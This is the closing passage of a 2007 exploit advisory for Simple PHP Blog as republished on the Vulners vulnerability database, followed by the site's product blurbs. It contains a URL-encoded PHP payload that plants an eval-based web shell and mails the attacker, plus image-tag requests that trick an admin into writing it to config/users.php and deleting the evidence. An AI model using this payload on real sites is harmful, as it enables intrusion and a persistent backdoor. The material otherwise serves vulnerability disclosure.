&nbsp;&nbsp;%3CMAIL%0D%0Ahacker%40you.com%0D%0AMAIL%3B%0D%0A%0D%0
&nbsp;&nbsp;A%24subject+%3D+%3C%3C%3CSUBJ%0D%0AHey+%21%0D%0ASUBJ%
&nbsp;&nbsp;3B%0D%0A%0D%0A%24body+%3D+%3C%3C%3CBODY%0D%0ACode+exe
&nbsp;&nbsp;cuted%0D%0ABODY%3B%0D%0A%0D%0Amail%28%24mail%2C%24sub
&nbsp;&nbsp;ject%2C%24body%29%3B%0D%0A%7D%0D%0Aelse+eval%28%24_SE
&nbsp;&nbsp;RVER%5BHTTP_SHELL%5D%29%3B%0D%0A%0D%0A%3F%3E&gt;
&nbsp;&nbsp;&lt;!---&nbsp;Write&nbsp;php&nbsp;code&nbsp;---&gt;

&nbsp;&nbsp;&lt;img&nbsp;src=http://&lt;site&gt;/config/users.php?mail=1&gt;
&nbsp;&nbsp;&lt;!---&nbsp;mail&nbsp;the&nbsp;attacker&nbsp;---&gt;

&nbsp;&nbsp;&lt;img&nbsp;src=http://&lt;site&gt;/trackback_delete_cgi.php?track
&nbsp;&nbsp;back=MY_COMMENT_FILENAME&gt;
&nbsp;&nbsp;&lt;!---&nbsp;delete&nbsp;the&nbsp;comment&nbsp;---&gt;

&nbsp;&nbsp;After,&nbsp;he&nbsp;have&nbsp;to&nbsp;wait&nbsp;until&nbsp;the&nbsp;admin&nbsp;see&nbsp;his&nbsp;comment.
&nbsp;&nbsp;Then&nbsp;the&nbsp;HTTP&nbsp;request&nbsp;will&nbsp;be&nbsp;sent&nbsp;to&nbsp;the&nbsp;script,&nbsp;and
&nbsp;&nbsp;so&nbsp;the&nbsp;PHP&nbsp;code&nbsp;will&nbsp;be&nbsp;written&nbsp;into&nbsp;&quot;config/users.php&quot;.



&nbsp;&nbsp;IX&nbsp;-&nbsp;END
&nbsp;&nbsp;
&nbsp;&nbsp;As&nbsp;you&nbsp;can&nbsp;see&nbsp;there's&nbsp;some&nbsp;pretty&nbsp;cool&nbsp;things&nbsp;here:
&nbsp;
&nbsp;&nbsp;-&nbsp;[III]&nbsp;We&nbsp;bypass&nbsp;Noscript&nbsp;firefox&nbsp;plugin&nbsp;protection.
&nbsp;&nbsp;&nbsp;&nbsp;We&nbsp;don't&nbsp;use&nbsp;any&nbsp;&lt;script&gt;&nbsp;tags.

&nbsp;&nbsp;-&nbsp;[V]&nbsp;We&nbsp;use&nbsp;a&nbsp;&quot;self&nbsp;inclusion&quot;&nbsp;technique.
&nbsp;&nbsp;&nbsp;&nbsp;We&nbsp;use&nbsp;html&nbsp;and&nbsp;php&nbsp;commentary&nbsp;tags&nbsp;which&nbsp;are&nbsp;very
&nbsp;&nbsp;&nbsp;&nbsp;useful&nbsp;in&nbsp;our&nbsp;case.

&nbsp;&nbsp;I&nbsp;didn't&nbsp;contacted&nbsp;the&nbsp;author&nbsp;of&nbsp;the&nbsp;script,&nbsp;but&nbsp;if
&nbsp;&nbsp;he&nbsp;keeps&nbsp;himself&nbsp;informed&nbsp;of&nbsp;updates&nbsp;concerning&nbsp;his
&nbsp;&nbsp;script,&nbsp;he&nbsp;should&nbsp;correct&nbsp;these&nbsp;vulnerabilities&nbsp;as
&nbsp;&nbsp;quickly&nbsp;as&nbsp;possible.


&nbsp;&nbsp;//Greetz:&nbsp;ddx39,&nbsp;berga,&nbsp;wo,&nbsp;overlock[]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
23 Oct 2007 00:00Current
7.1High risk
Vulners AI Score7.1
simple php blogmultiple vulnerabilitiesmediumhighip spoofingcross site scriptingsession fixationcrlf injectionfile inclusionfile deletionfile upload vulnerabilitycode execution
14